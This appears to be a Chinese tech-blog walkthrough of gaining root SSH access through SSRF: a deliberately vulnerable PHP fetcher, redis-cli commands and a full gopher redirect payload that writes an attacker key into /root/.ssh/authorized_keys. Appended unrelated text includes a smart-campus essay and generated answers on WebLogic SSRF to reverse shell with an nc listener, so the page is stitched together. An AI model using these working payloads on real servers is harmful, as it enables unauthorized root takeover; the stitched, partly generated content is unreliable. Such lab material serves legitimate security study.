ssrf实现.SSH未创建写shell

目录

1、环境

2、生成公钥(kali)

3、伪造redis数据

4、攻击

5、登录

1、环境

ubuntu:test.html:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form action="test.php" method="post">
        input url: <input type="text" name="url"><br>
        <input type="submit" value="submit">
 
    </form>
</body>
</html>

test.php:

<?php
        function check_ip($url)   
        {
                $match_res=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url);
                if(!$match_res)
                {
                        echo 'url fomat erro';
                        exit();
                }
                try
                {
                        $url_parse=parse_url($url);
                }
                catch(Exception $e)
                {
                        echo 'url fomat error';
                        exit();
                }
                $ip=gethostbyname($url_parse['host']);
                echo $ip;
                $ini_ip=ip2long($ip);
                if ($ini_ip>>24==ip2long('127.0.0.0')>>24||$ini_ip==ip2long('服务机公网ip'))
                {
                        echo "ip can not inner ip";
                        exit();
                }
        }
 
        $ch=curl_init();
        $url=$_GET['url'];
        check_ip($url);
        curl_setopt($ch,CURLOPT_URL,$url);
        curl_setopt($ch,CURLOPT_HEADER,0);
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
        curl_setopt($ch,CURLOPT_REDIR_PROTOCOLS,CURLPROTO_GOPHER);  
        curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);          
        $res=curl_exec($ch);
        curl_close($ch);
        echo $res;
 
?>

2、生成公钥(kali)

cd /root/.ssh

ssh-keygen -t rsa

3、伪造redis数据

redis-cli -p 1234 fushall
 
echo -e "\n\n
ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABgQDa1V8TRqynbl7Lx0eOuOB3k7f4o9m0jtj96X7Z5BW3HCUagionxr5FRzV6GHjKzjJYrFf43QsedgnY3UPZEx0oo3QVZhRsacx3/qkSevkZvA+KpBygyH/2/OUIlpXtgWLilkxSy8yWSGc573gtHJhNgdrtaGUahHprCM1RTBqCkC7SeYN07kUhXuDAlZrJKyT3G2jI3LHcz6O4EJF4n2zZlm2IOQupdfEhiZAKs4GX+7SZ/kK1JWlEy/m12cUcQrDzTPFKVM/RQ6h5+gKshq+f5IMtzXuN3m0WZ9vXoHMnsVrGNBdd++7Hd2bHSMLnhjgdH9x8BEner4QR0WgRTMySkRj9Gqoc8QMRJpl8CzNrKEEOAkRScDW26qaAaKW4V44Nuupq2HO0QYWCEvOMGEQYVj2zM66VqZTZHaZhj5Gnkot3vo6/6h1bcTiOlIt7DCIIP1q+2fg3SUL9JsH3denkc/QUrAOoBlvfL3ruvCbTVgW4HM20kH+ltpt5RdKf0s0= root@kali\n\n" | redis-cli -p 1234 -x set a   
 
redis-cli -p 1234 config set dir /var/www/html/ 
 
redis-cli -p 1234 config set dbfilename shell.php  

4、攻击

<?php
header("Location: gopher://127.0.0.1:6379/_*1%0d%0A%248%0d%0Aflushall%0d%0A*3%0d%0A%243%0d%0Aset%0d%0A%241%0d%0A1%0d%0A%24567%0d%0A%0A%0Assh-rsa%20AAAAB3NzaC1yc2EAAAADAQABAAABgQDa1V8TRqynbl7Lx0eOuOB3k7f4o9m0jtj96X7Z5BW3HCUagionxr5FRzV6GHjKzjJYrFf43QsedgnY3UPZEx0oo3QVZhRsacx3/qkSevkZvA+KpBygyH/2/OUIlpXtgWLilkxSy8yWSGc573gtHJhNgdrtaGUahHprCM1RTBqCkC7SeYN07kUhXuDAlZrJKyT3G2jI3LHcz6O4EJF4n2zZlm2IOQupdfEhiZAKs4GX+7SZ/kK1JWlEy/m12cUcQrDzTPFKVM/RQ6h5+gKshq+f5IMtzXuN3m0WZ9vXoHMnsVrGNBdd++7Hd2bHSMLnhjgdH9x8BEner4QR0WgRTMySkRj9Gqoc8QMRJpl8CzNrKEEOAkRScDW26qaAaKW4V44Nuupq2HO0QYWCEvOMGEQYVj2zM66VqZTZHaZhj5Gnkot3vo6/6h1bcTiOlIt7DCIIP1q+2fg3SUL9JsH3denkc/QUrAOoBlvfL3ruvCbTVgW4HM20kH+ltpt5RdKf0s0= root@kali%20root@kali%0A%0A%0A%0d%0A*4%0d%0A%246%0d%0Aconfig%0d%0A%243%0d%0Aset%0d%0A%243%0d%0Adir%0d%0A%2411%0d%0A/root/.ssh/%0d%0A*4%0d%0A%246%0d%0Aconfig%0d%0A%243%0d%0Aset%0d%0A%2410%0d%0Adbfilename%0d%0A%2415%0d%0Aauthorized_keys%0d%0A*1%0d%0A%244%0d%0Asave%0d%0A");
?>

5、登录

在/root/.ssh目录

ssh -i id_rsa root@xxx.xxx.xxx.xxx

  • 5
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
智慧校园2.0是高校信息化建设的新阶段,它面对着外部环境变化和内生动力的双重影响。国家战略要求和信息技术的快速发展,如云计算、大数据、物联网等,为智慧校园建设提供了机遇,同时也带来了挑战。智慧校园2.0强调以服务至上的办学理念,推动了教育模式的创新,并对传统人才培养模式产生了重大影响。 智慧校园建设的解决之道是构建一个开放、共享的信息化生态系统,利用互联网思维,打造柔性灵活的基础设施和强大的基础服务能力。这种生态系统支持快速迭代的开发和持续运营交付能力,同时注重用户体验,推动服务创新和管理变革。智慧校园的核心思想是“大平台+微应用+开放生态”,通过解耦、重构和统一运维监控,实现服务复用和深度融合,促进业务的快速迭代和自我演化。 智慧校园的总体框架包括多端协同,即“端”,它强调以人为中心,全面感知和捕获行为数据。这涉及到智能感知设备、超级APP、校园融合门户等,实现一“码”或“脸”通行,提供线上线下服务端的无缝连接。此外,中台战略是智慧校园建设的关键,包括业务中台和数据中台,它们支持教育资源域、教学服务域等多个领域,实现业务的深度融合和数据的全面治理。 在技术层面,智慧校园的建设需要分期进行,逐步解耦应用,优先发展轻量级应用,并逐步覆盖更多业务场景。技术升级路径包括业务数据化、数据业务化、校园设施智联化等,利用IoT/5G等技术实现设备的泛在互联,并通过人工智能与物联网技术的结合,建设智联网。这将有助于实现线上线下一网通办,提升校园安全和学习生活体验,同时支持人才培养改革和后勤管理的精细化。 智慧校园的建设不仅仅是技术的升级,更是对教育模式和管理方式的全面革新。通过构建开放、共享的信息化生态系统,智慧校园能够更好地适应快速变化的教育需求,提供更加个性化和高效的服务,推动教育创新和人才培养的高质量发展。
### 回答1: WebLogic SSRF 漏洞可以被滥用以执行远程代码,包括反弹 shell。下面是一种可能的方法: 1. 确保你有一台能够监听反弹 shell 的主机,并且已经在等待连接。 2. 使用 SSRF 漏洞向目标 WebLogic 服务器发送 HTTP 请求,以获取访问内部资源的权限。例如,可以使用以下请求: ``` POST /console/images/%252E%252E%252Fconsole.portal HTTP/1.1 Host: <目标 WebLogic 服务器> Content-Length: 102 weblogic.userConsoleMode=true&consoleTabId=&redirectPage=&redirectServlet=&logoutTabId=&logoutCancelTabId=&logoutSubmitTabId=&cancelTabId=&startHelpWindow=&returnToHelp=&helpWindowTitle=&helpWindowWidth=&helpWindowHeight=&helpWindowTop=&helpWindowLeft=&helpWindowStatus=&helpWindowScrollbars=&helpWindowResizable=&helpWindowMaximize=&helpWindowUri=h%74tp://<你的 IP 地址>:<监听端口>/ ``` 注意,这个请求将把 WebLogic 控制台重定向到你的主机。当 WebLogic 尝试访问你的主机时,它将尝试连接到你的监听端口,并执行任何发送的命令。 3. 等待连接,并在成功连接后执行任意命令。例如,你可以使用以下命令反弹 shell: ``` nc -lvnp <监听端口> ``` 这将在你的主机上启动一个监听器,等待从目标 WebLogic 服务器返回的反弹 shell。如果成功利用了 SSRF 漏洞,你应该会在监听器上看到一个 shell。 ### 回答2: WebLogic是一种广泛使用的Java应用服务器,但在某些版本中存在安全漏洞,其中之一是SSRF(Server-Side Request Forgery)漏洞。在此漏洞中,攻击者可以通过构造特定恶意请求,使WebLogic服务器执行非预期的请求。下面我们将讨论如何利用WebLogic SSRF漏洞来反弹shell。 首先,要利用SSRF漏洞,攻击者需要找到WebLogic应用程序中存在这个漏洞的组件。一旦找到漏洞组件,攻击者可以构造一个特定的恶意请求,将目标服务器指向一个恶意的外部URL。 接下来,攻击者需要在恶意URL中包含一个恶意的shell代码。这个shell代码可以是一段PHP、ASP或其他脚本语言,用于在远程服务器上执行命令。 当目标WebLogic服务器接收到恶意请求并执行时,它将访问恶意URL并获取恶意代码。如果成功执行,攻击者就可以在目标服务器上获得shell访问权限,从而可以执行任意命令。 为了使反弹的shell更持久和稳定,攻击者可以持续与目标服务器进行交互,并保持shell会话。这样,即使初始的SSRF漏洞请求被修补或检测到,攻击者仍然可以在以后的时间内保持对服务器的控制。 为了防止SSRF漏洞,WebLogic服务器的管理员需要采取一些安全措施。这些措施包括更新到最新的WebLogic版本以修复已知的漏洞,配置严格的访问控制列表,限制对敏感资源的访问,并对来自外部的请求进行过滤和验证。 总之,利用WebLogic SSRF漏洞反弹shell是一种非法行为,违反了计算机系统的安全和隐私。我们强烈建议所有用户和管理员采取适当的安全措施来保护WebLogic服务器免受此类漏洞的攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值